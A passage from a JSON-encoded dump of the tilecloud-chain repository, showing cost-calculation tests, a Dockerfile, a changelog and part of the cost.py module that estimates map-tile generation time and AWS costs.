tilegeneration/test-fix.yaml -l polygon\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"Calculate zoom 4.\",\n \"\",\n self.ZOOM_SUMMARY % {\"tiles\": \"13\", \"zoom\": \"0\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"35\", \"zoom\": \"1\", \"time\": \"0:00:02\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"167\", \"zoom\": \"2\", \"time\": \"0:00:10\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"601\", \"zoom\": \"3\", \"time\": \"0:00:36\", \"s3\": \"0.01\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"2268\", \"zoom\": \"4\", \"time\": \"0:02:16\", \"s3\": \"0.02\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"3084\", \"time\": \"0:03:05\", \"cost\": \"0.03\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.00\",\n \"get\": \"32.89\",\n # 'cloudfront': '31.89',\n },\n ]\n ),\n )\n\n def test_cost_polygon_count(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -c tilegeneration/test-fix.yaml \"\n \"-l polygon --cost-algo count\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"Calculate zoom 4.\",\n \"\",\n self.ZOOM_SUMMARY % {\"tiles\": \"12\", \"zoom\": \"0\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"35\", \"zoom\": \"1\", \"time\": \"0:00:02\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"165\", \"zoom\": \"2\", \"time\": \"0:00:09\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"609\", \"zoom\": \"3\", \"time\": \"0:00:36\", \"s3\": \"0.01\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"2240\", \"zoom\": \"4\", \"time\": \"0:02:14\", \"s3\": \"0.02\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"3061\", \"time\": \"0:03:03\", \"cost\": \"0.03\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.00\",\n \"get\": \"32.89\",\n # 'cloudfront': '31.89',\n },\n ]\n ),\n )\n\n def test_cost_default(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -c tilegeneration/test-fix.yaml\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"\",\n \"===== line =====\",\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"Calculate zoom 4.\",\n \"\",\n \"2 meta tiles in zoom 0.\",\n \"2 meta tiles in zoom 1.\",\n \"4 meta tiles in zoom 2.\",\n \"8 meta tiles in zoom 3.\",\n \"14 meta tiles in zoom 4.\",\n self.ZOOM_SUMMARY % {\"tiles\": \"11\", \"zoom\": \"0\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"19\", \"zoom\": \"1\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"43\", \"zoom\": \"2\", \"time\": \"0:00:01\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"84\", \"zoom\": \"3\", \"time\": \"0:00:02\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"164\", \"zoom\": \"4\", \"time\": \"0:00:05\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"321\", \"time\": \"0:00:10\", \"cost\": \"0.00\"},\n \"\",\n \"===== polygon =====\",\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"Calculate zoom 4.\",\n \"\",\n self.ZOOM_SUMMARY % {\"tiles\": \"13\", \"zoom\": \"0\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"35\", \"zoom\": \"1\", \"time\": \"0:00:02\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"167\", \"zoom\": \"2\", \"time\": \"0:00:10\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"601\", \"zoom\": \"3\", \"time\": \"0:00:36\", \"s3\": \"0.01\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"2268\", \"zoom\": \"4\", \"time\": \"0:02:16\", \"s3\": \"0.02\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"3084\", \"time\": \"0:03:05\", \"cost\": \"0.03\"},\n self.GLOBAL_SUMMARY % {\"tiles\": \"3405\", \"time\": \"0:03:15\", \"cost\": \"0.03\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.00\",\n \"get\": \"55.78\",\n # 'cloudfront': '54.78',\n },\n ]\n ),\n )\n\n def test_cost_polygon2(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -c tilegeneration/test-fix.yaml -l polygon2\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"\",\n \"925 meta tiles in zoom 0.\",\n \"21310 meta tiles in zoom 1.\",\n \"84341 meta tiles in zoom 2.\",\n self.ZOOM_SUMMARY % {\"tiles\": \"54534\", \"zoom\": \"0\", \"time\": \"0:27:43\", \"s3\": \"0.55\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"1340772\", \"zoom\": \"1\", \"time\": \"11:21:02\", \"s3\": \"13.41\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY\n % {\"tiles\": \"5351829\", \"zoom\": \"2\", \"time\": \"1 21:18:05\", \"s3\": \"53.52\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"6747135\", \"time\": \"2 9:06:51\", \"cost\": \"67.47\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.02\",\n \"get\": \"32.89\",\n # 'cloudfront': '31.89',\n },\n ]\n ),\n )\n\n def test_cost_nometa(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -c tilegeneration/test-fix.yaml -l all\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"Calculate zoom 4.\",\n \"\",\n self.ZOOM_SUMMARY % {\"tiles\": \"2\", \"zoom\": \"0\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"4\", \"zoom\": \"1\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"10\", \"zoom\": \"2\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"27\", \"zoom\": \"3\", \"time\": \"0:00:01\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"84\", \"zoom\": \"4\", \"time\": \"0:00:05\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"127\", \"time\": \"0:00:07\", \"cost\": \"0.00\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.00\",\n \"get\": \"32.89\",\n # 'cloudfront': '31.89',\n },\n ]\n ),\n )\n\n def test_cost_layer_bbox(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -c tilegeneration/test-fix.yaml -l all --cost-algo count\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"Calculate zoom 4.\",\n \"\",\n self.ZOOM_SUMMARY % {\"tiles\": \"2\", \"zoom\": \"0\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"2\", \"zoom\": \"1\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"9\", \"zoom\": \"2\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"25\", \"zoom\": \"3\", \"time\": \"0:00:01\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"81\", \"zoom\": \"4\", \"time\": \"0:00:04\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"119\", \"time\": \"0:00:07\", \"cost\": \"0.00\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.00\",\n \"get\": \"32.89\",\n # 'cloudfront': '31.89',\n },\n ]\n ),\n )\n\n def test_cost_no_geom(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -c tilegeneration/test-fix.yaml -l point --no-geom\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"\",\n \"11 meta tiles in zoom 0.\",\n \"28 meta tiles in zoom 1.\",\n \"123 meta tiles in zoom 2.\",\n \"427 meta tiles in zoom 3.\",\n self.ZOOM_SUMMARY % {\"tiles\": \"312\", \"zoom\": \"0\", \"time\": \"0:00:09\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"1090\", \"zoom\": \"1\", \"time\": \"0:00:33\", \"s3\": \"0.01\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"6237\", \"zoom\": \"2\", \"time\": \"0:03:10\", \"s3\": \"0.06\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"24190\", \"zoom\": \"3\", \"time\": \"0:12:18\", \"s3\": \"0.24\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"31829\", \"time\": \"0:16:12\", \"cost\": \"0.32\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.00\",\n \"get\": \"32.89\",\n # 'cloudfront': '31.89',\n },\n ]\n ),\n )\n\n def test_cost_sqs_nometa(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -c tilegeneration/test.yaml -l point_hash_no_meta\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"Calculate zoom 4.\",\n \"\",\n self.ZOOM_SUMMARY % {\"tiles\": \"279\", \"zoom\": \"0\", \"time\": \"0:00:16\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"1026\", \"zoom\": \"1\", \"time\": \"0:01:01\", \"s3\": \"0.01\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"6079\", \"zoom\": \"2\", \"time\": \"0:06:04\", \"s3\": \"0.06\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"23876\", \"zoom\": \"3\", \"time\": \"0:23:52\", \"s3\": \"0.24\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"94626\", \"zoom\": \"4\", \"time\": \"1:34:37\", \"s3\": \"0.95\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"125886\", \"time\": \"2:05:53\", \"cost\": \"1.26\"},\n self.FINAL_SUMMARY % {\"storage\": \"0.00\", \"get\": \"32.89\"},\n ]\n ),\n )\n" }, { "alpha_fraction": 0.6896615624427795, "alphanum_fraction": 0.7063964009284973, "avg_line_length": 35.33783721923828, "blob_id": "8cceecdabe12f4f06390ead8145764e2ef851953", "content_id": "40f75374e2ae9446bcc4447eb7966bdc0fcde10e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 5378, "license_type": "permissive", "max_line_length": 123, "num_lines": 148, "path": "/Dockerfile", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "# Base of all section, install the apt packages\nFROM ghcr.io/osgeo/gdal:ubuntu-small-3.7.1 as base-all\nLABEL maintainer Camptocamp \"[email protected]\"\n\n# Fail on error on pipe, see: https://github.com/hadolint/hadolint/wiki/DL4006.\n# Treat unset variables as an error when substituting.\n# Print commands and their arguments as they are executed.\nSHELL [\"/bin/bash\", \"-o\", \"pipefail\", \"-cux\"]\n\nRUN --mount=type=cache,target=/var/lib/apt/lists \\\n --mount=type=cache,target=/var/cache,sharing=locked \\\n apt-get update \\\n && apt-get upgrade --assume-yes \\\n && apt-get install --assume-yes --no-install-recommends \\\n libmapnik3.1 mapnik-utils \\\n libdb5.3 \\\n fonts-dejavu \\\n optipng jpegoptim \\\n postgresql-client net-tools iputils-ping \\\n python3-pip\n\n# Used to convert the locked packages by poetry to pip requirements format\n# We don't directly use `poetry install` because it force to use a virtual environment.\nFROM base-all as poetry\n\n# Install Poetry\nWORKDIR /tmp\nCOPY requirements.txt ./\nRUN --mount=type=cache,target=/root/.cache \\\n python3 -m pip install --disable-pip-version-check --requirement=requirements.txt\n\n# Do the conversion\nCOPY poetry.lock pyproject.toml ./\nENV POETRY_DYNAMIC_VERSIONING_BYPASS=0.0.0\nRUN poetry export --output=requirements.txt \\\n && poetry export --with=dev --output=requirements-dev.txt\n\n# Base, the biggest thing is to install the Python packages\nFROM base-all as base\n\nRUN --mount=type=cache,target=/var/lib/apt/lists \\\n --mount=type=cache,target=/var/cache,sharing=locked \\\n --mount=type=cache,target=/root/.cache \\\n --mount=type=bind,from=poetry,source=/tmp,target=/poetry \\\n DEV_PACKAGES=\"python3-dev build-essential libgeos-dev libmapnik-dev libpq-dev build-essential\" \\\n && apt-get update \\\n && apt-get install --assume-yes --no-install-recommends ${DEV_PACKAGES} \\\n && python3 -m pip install --disable-pip-version-check --no-deps --requirement=/poetry/requirements.txt \\\n && python3 -m compileall /usr/local/lib/python* /usr/lib/python* \\\n && strip /usr/local/lib/python*/dist-packages/shapely/*.so \\\n && apt-get remove --purge --autoremove --yes ${DEV_PACKAGES} binutils\n\n# From c2cwsgiutils\n\nCMD [\"gunicorn\", \"--paste=/app/production.ini\"]\n\nENV LOG_TYPE=console \\\n DEVELOPMENT=0 \\\n PKG_CONFIG_ALLOW_SYSTEM_LIBS=OHYESPLEASE\n\nENV C2C_SECRET= \\\n C2C_BASE_PATH=/c2c \\\n C2C_REDIS_URL= \\\n C2C_REDIS_SENTINELS= \\\n C2C_REDIS_TIMEOUT=3 \\\n C2C_REDIS_SERVICENAME=mymaster \\\n C2C_REDIS_DB=0 \\\n C2C_BROADCAST_PREFIX=broadcast_api_ \\\n C2C_REQUEST_ID_HEADER= \\\n C2C_REQUESTS_DEFAULT_TIMEOUT= \\\n C2C_SQL_PROFILER_ENABLED=0 \\\n C2C_PROFILER_PATH= \\\n C2C_PROFILER_MODULES= \\\n C2C_DEBUG_VIEW_ENABLED=0 \\\n C2C_ENABLE_EXCEPTION_HANDLING=0\n\n# End from c2cwsgiutils\n\nENV TILEGENERATION_CONFIGFILE=/etc/tilegeneration/config.yaml \\\n TILEGENERATION_MAIN_CONFIGFILE=/etc/tilegeneration/config.yaml \\\n TILEGENERATION_HOSTSFILE=/etc/tilegeneration/hosts.yaml \\\n TILECLOUD_CHAIN_LOG_LEVEL=INFO \\\n TILECLOUD_LOG_LEVEL=INFO \\\n C2CWSGIUTILS_LOG_LEVEL=WARN \\\n GUNICORN_LOG_LEVEL=WARN \\\n SQL_LOG_LEVEL=WARN \\\n OTHER_LOG_LEVEL=WARN \\\n VISIBLE_ENTRY_POINT=/ \\\n TILE_NB_THREAD=2 \\\n METATILE_NB_THREAD=25 \\\n SERVER_NB_THREAD=10 \\\n TILE_QUEUE_SIZE=2 \\\n TILE_CHUNK_SIZE=1 \\\n TILE_SERVER_LOGLEVEL=quiet \\\n TILE_MAPCACHE_LOGLEVEL=verbose\n\nEXPOSE 8080\n\nWORKDIR /app/\n\n# The final part\nFROM base as runner\n\nCOPY . /app/\nARG VERSION=dev\nENV POETRY_DYNAMIC_VERSIONING_BYPASS=dev\nRUN --mount=type=cache,target=/root/.cache \\\n POETRY_DYNAMIC_VERSIONING_BYPASS=${VERSION} python3 -m pip install --disable-pip-version-check --no-deps --editable=. \\\n && mv docker/run /usr/bin/ \\\n && python3 -m compileall -q /app/tilecloud_chain\n\nRUN mkdir -p /prometheus-metrics \\\n && chmod a+rwx /prometheus-metrics\nENV PROMETHEUS_MULTIPROC_DIR=/prometheus-metrics\n\n# Do the lint, used by the tests\nFROM base as tests\n\nRUN --mount=type=cache,target=/var/lib/apt/lists \\\n --mount=type=cache,target=/var/cache,sharing=locked \\\n apt-get install --assume-yes --no-install-recommends git curl gnupg \\\n libglib2.0-0 libnss3 libatk1.0-0 libatk-bridge2.0-0 libcups2 libdrm2 libxkbcommon0 libxcomposite1 \\\n libxdamage1 libxfixes3 libxrandr2 libgbm1 libpango-1.0-0 libcairo2 libasound2\n\nRUN --mount=type=cache,target=/var/lib/apt/lists \\\n --mount=type=cache,target=/var/cache,sharing=locked \\\n . /etc/os-release \\\n && echo \"deb https://deb.nodesource.com/node_18.x ${VERSION_CODENAME} main\" > /etc/apt/sources.list.d/nodesource.list \\\n && curl --silent https://deb.nodesource.com/gpgkey/nodesource.gpg.key | apt-key add - \\\n && apt-get update \\\n && apt-get install --assume-yes --no-install-recommends 'nodejs=18.*'\n\nCOPY package.json package-lock.json ./\nRUN npm install --dev\n\nRUN --mount=type=cache,target=/root/.cache \\\n --mount=type=bind,from=poetry,source=/tmp,target=/poetry \\\n python3 -m pip install --disable-pip-version-check --no-deps --requirement=/poetry/requirements-dev.txt\n\nCOPY . ./\nRUN --mount=type=cache,target=/root/.cache \\\n POETRY_DYNAMIC_VERSIONING_BYPASS=0.0.0 python3 -m pip install --disable-pip-version-check --no-deps --editable=. \\\n && python3 -m pip freeze > /requirements.txt\n\nENV TILEGENERATION_MAIN_CONFIGFILE=\n\n# Set runner as final\nFROM runner\n" }, { "alpha_fraction": 0.6915462613105774, "alphanum_fraction": 0.7065275311470032, "avg_line_length": 36.75757598876953, "blob_id": "3f9f6661fc1cb4e9ac7d719aa2348c2fce7d6f83", "content_id": "34f1ab9514e73110ae50f89e41d2b082e15441e9", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3738, "license_type": "permissive", "max_line_length": 112, "num_lines": 99, "path": "/CHANGES.md", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "# Changelog\n\n## Release 1.17\n\n1. Change the validator and parser => duplicate key generate an error: on/off are no more considered as boolean.\n2. The argument --layer is no more used when we use the parameter --tiles, we get the information from the\n tiles file.\n3. Be able to mutualise the service.\n4. Add Azure blob storage\n5. Remove Apache and MapCache\n6. Remove the `log_format` in the `generation` configuration, nor we use the logging configuration from the\n `development.ini` file.\n\n## Release 1.16\n\n1. Change the config validator who is a little bit more strict.\n\n## Release 1.4\n\n1. Add optional `metadata` section to the config file. See the scaffolds for example.\n\n## Release 0.9\n\n1. Correct some error with slash.\n2. Better error handling.\n3. Be able to have one error file per layer.\n\n## Release 0.8\n\n1. Correct some error with slash.\n2. Add `pre_hash_post_process` and `post_process`.\n3. Add copy command.\n\n## Release 0.7\n\n1. Support of deferent geoms per layers, requires configuration changes, old version:\n\n > ```yaml\n > connection: user=www-data password=www-data dbname=<db> host=localhost\n > sql: <column> AS geom FROM <table>\n > ```\n >\n > to new version:\n >\n > ```yaml\n > connection: user=www-data password=www-data dbname=<db> host=localhost\n > geoms:\n > - sql: <column> AS geom FROM <table>\n > ```\n >\n > More information in the **Configure geom/sql** chapter.\n\n2. Update from `optparse` to `argparse`, and some argument refactoring, use `--help` to see the new version.\n3. Add support of Blackbery DB (`bsddb`).\n4. The tile `server` is completely rewrite, now it support all cache, `REST` and `KVP` interface,\n `GetFeatureInfo` request, and it can be used as a pyramid view or as a `WSGI` server. More information in\n the **istribute the tiles** chapter.\n5. Add three strategy to bypass the proxy/cache: Use the headers `Cache-Control: no-cache, no-store`,\n `Pragma: no-cache` (default). Use localhost in the URL and the header `Host: <host_name>` (recommended).\n Add a `SALT` random argument (if the above don't work). More information in the **Proxy/cache issue**\n chapter.\n6. Improve the dimensions usage by adding it ti the WMS requests, And add a `--dimensions` argument of\n `generate_tiles` to change the dimensions values.\n7. Extract generate_cost and generate_amazon from generate_controler.\n8. Now we can creates legends, see the **Legends** chapter.\n9. Now the tiles generation display generation statistics at the ends.\n10. The EC2 configuration is moved in a separate structure, see README for more information.\n\n## Release 0.6\n\n1. Now the apache configuration can be generated with\n `.build/venv/bin/generate_controller --generate-apache-config`, it support `filesystem` `cache` and\n `MapCache`.\n2. Windows fixes.\n3. Use console rewrite (r) to log generated tiles coordinates.\n4. Now if no layers is specified in `generation:default_layers` we generate all layers by default.\n5. Now bbox to be floats.\n6. New `--get-bbox` option to get the bbox of a tile.\n7. Add coveralls support (<https://coveralls.io/r/camptocamp/tilecloud-chain>).\n8. Add an config option `generation:error_file` and a command option `--tiles` to store and regenerate\n errored tiles.\n\n## Release 0.5\n\n1. SQS config change:\n\n```yaml\nlayers:\n layer_name:\n sqs:\n # The region where the SQS queue is\n region: eu-west-1\n # The SQS queue name, it should already exists\n queue: the_name\n```\n\n2. Add debug option (`--debug`), please use it to report issue.\n3. Now the `sql` request can return a set of geometries in a column names geom but the syntax change a little\n bit =&gt; `<column> AS geom FROM <table>`\n" }, { "alpha_fraction": 0.5258588790893555, "alphanum_fraction": 0.5388189554214478, "avg_line_length": 37.76303482055664, "blob_id": "f9222f65ae95995c14c7be580060804aff982956", "content_id": "0b2822ad64aa44ce0e4113d2c0c56905b921660e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8179, "license_type": "permissive", "max_line_length": 108, "num_lines": 211, "path": "/tilecloud_chain/cost.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import logging\nimport sys\nfrom argparse import ArgumentParser, Namespace\nfrom datetime import timedelta\nfrom typing import Iterable, Iterator, Optional, Tuple\n\nfrom tilecloud import Tile, TileStore\nfrom tilecloud_chain import Run, TileGeneration, add_common_options\nfrom tilecloud_chain.format import duration_format\n\nlogger = logging.getLogger(__name__)\n\n\ndef main() -> None:\n \"\"\"Calculate the cost, main function.\"\"\"\n try:\n parser = ArgumentParser(description=\"Used to calculate the generation cost\", prog=sys.argv[0])\n add_common_options(parser, tile_pyramid=False, dimensions=True)\n parser.add_argument(\n \"--cost-algo\",\n \"--calculate-cost-algorithm\",\n default=\"area\",\n dest=\"cost_algo\",\n choices=(\"area\", \"count\"),\n help=\"The algorithm use to calculate the cost default base on the 'area' \"\n \"of the generation geometry, can also be 'count', to be base on number of tiles to generate.\",\n )\n\n options = parser.parse_args()\n gene = TileGeneration(\n options.config,\n options=options,\n layer_name=options.layer,\n base_config={\"cost\": {}},\n multi_thread=False,\n )\n config = gene.get_config(options.config)\n\n all_size: float = 0\n tile_size: float = 0\n all_tiles = 0\n if options.layer:\n layer = config.config[\"layers\"][options.layer]\n (all_size, all_time, all_price, all_tiles) = _calculate_cost(gene, options.layer, options)\n tile_size = layer[\"cost\"][\"tile_size\"] / (1024.0 * 1024)\n else:\n all_time = timedelta()\n all_price = 0\n for layer_name in gene.get_config(options.config).config[\"generation\"][\"default_layers\"]:\n print()\n print(f\"===== {layer_name} =====\")\n layer = config.config[\"layers\"][layer_name]\n gene.create_log_tiles_error(layer_name)\n (size, time, price, tiles) = _calculate_cost(gene, layer_name, options)\n tile_size += layer[\"cost\"][\"tile_size\"] / (1024.0 * 1024)\n all_time += time\n all_price += price\n all_size += size\n all_tiles += tiles\n\n print()\n print(\"===== GLOBAL =====\")\n print(f\"Total number of tiles: {all_tiles}\")\n print(f\"Total generation time: {duration_format(all_time)} [d h:mm:ss]\")\n print(f\"Total generation cost: {all_price:0.2f} [$]\")\n print()\n s3_cost = all_size * gene.get_main_config().config[\"cost\"][\"s3\"][\"storage\"] / (1024.0 * 1024 * 1024)\n print(f\"S3 Storage: {s3_cost:0.2f} [$/month]\")\n s3_get_cost = (\n gene.get_main_config().config[\"cost\"][\"s3\"][\"get\"]\n * config.config[\"cost\"][\"request_per_layers\"]\n / 10000.0\n + gene.get_main_config().config[\"cost\"][\"s3\"][\"download\"]\n * config.config[\"cost\"][\"request_per_layers\"]\n * tile_size\n )\n print(f\"S3 get: {s3_get_cost:0.2f} [$/month]\")\n # if 'cloudfront' in gene.config['cost']:\n # print('CloudFront: %0.2f [$/month]' % ()\n # gene.config['cost']['cloudfront']['get'] *\n # gene.config['cost']['request_per_layers'] / 10000.0 +\n # gene.config['cost']['cloudfront']['download'] *\n # gene.config['cost']['request_per_layers'] * tile_size)\n except SystemExit:\n raise\n except: # pylint: disable=bare-except\n logger.exception(\"Exit with exception\")\n sys.exit(1)\n\n\ndef _calculate_cost(\n gene: TileGeneration, layer_name: str, options: Namespace\n) -> Tuple[float, timedelta, float, int]:\n nb_metatiles = {}\n nb_tiles = {}\n config = gene.get_config(options.config)\n layer = config.config[\"layers\"][layer_name]\n\n meta = layer[\"meta\"]\n if options.cost_algo == \"area\":\n tile_size = config.config[\"grids\"][layer[\"grid\"]][\"tile_size\"]\n for zoom, resolution in enumerate(config.config[\"grids\"][layer[\"grid\"]][\"resolutions\"]):\n if \"min_resolution_seed\" in layer and resolution < layer[\"min_resolution_seed\"]:\n continue\n\n print(f\"Calculate zoom {zoom}.\")\n\n px_buffer = layer[\"px_buffer\"] + layer[\"meta_buffer\"] if meta else 0\n m_buffer = px_buffer * resolution\n if meta:\n size = tile_size * layer[\"meta_size\"] * resolution\n meta_buffer = size * 0.7 + m_buffer\n meta_geom = gene.get_geoms(config, layer_name)[zoom].buffer(meta_buffer, 1)\n nb_metatiles[zoom] = int(round(meta_geom.area / size**2))\n size = tile_size * resolution\n tile_buffer = size * 0.7 + m_buffer\n geom = gene.get_geoms(config, layer_name)[zoom].buffer(tile_buffer, 1)\n nb_tiles[zoom] = int(round(geom.area / size**2))\n\n elif options.cost_algo == \"count\":\n gene.init_tilecoords(config, layer_name)\n gene.add_geom_filter()\n\n if meta:\n\n def count_metatile(tile: Tile) -> Tile:\n if tile:\n if tile.tilecoord.z in nb_metatiles:\n nb_metatiles[tile.tilecoord.z] += 1\n else:\n nb_metatiles[tile.tilecoord.z] = 1\n return tile\n\n gene.imap(count_metatile)\n\n class MetaTileSplitter(TileStore):\n \"\"\"Convert the metatile flow to tile flow.\"\"\"\n\n def get(self, tiles: Iterable[Optional[Tile]]) -> Iterator[Tile]:\n assert tiles is not None\n for metatile in tiles:\n assert metatile is not None\n for tilecoord in metatile.tilecoord:\n yield Tile(tilecoord)\n\n gene.add_metatile_splitter(MetaTileSplitter())\n\n # Only keep tiles that intersect geometry\n gene.add_geom_filter()\n\n def count_tile(tile: Tile) -> Tile:\n if tile:\n if tile.tilecoord.z in nb_tiles:\n nb_tiles[tile.tilecoord.z] += 1\n else:\n print(f\"Calculate zoom {tile.tilecoord.z}.\")\n nb_tiles[tile.tilecoord.z] = 1\n return tile\n\n gene.imap(count_tile)\n\n run = Run(gene, gene.functions_metatiles)\n assert gene.tilestream\n for tile in gene.tilestream:\n tile.metadata[\"layer\"] = layer_name\n run(tile)\n\n times = {}\n print()\n for z, nb_metatile in nb_metatiles.items():\n print(f\"{nb_metatile} meta tiles in zoom {z}.\")\n times[z] = layer[\"cost\"][\"metatile_generation_time\"] * nb_metatile\n\n price: float = 0\n all_size: float = 0\n all_time: float = 0\n all_tiles = 0\n for z, nb_tile in nb_tiles.items():\n print()\n 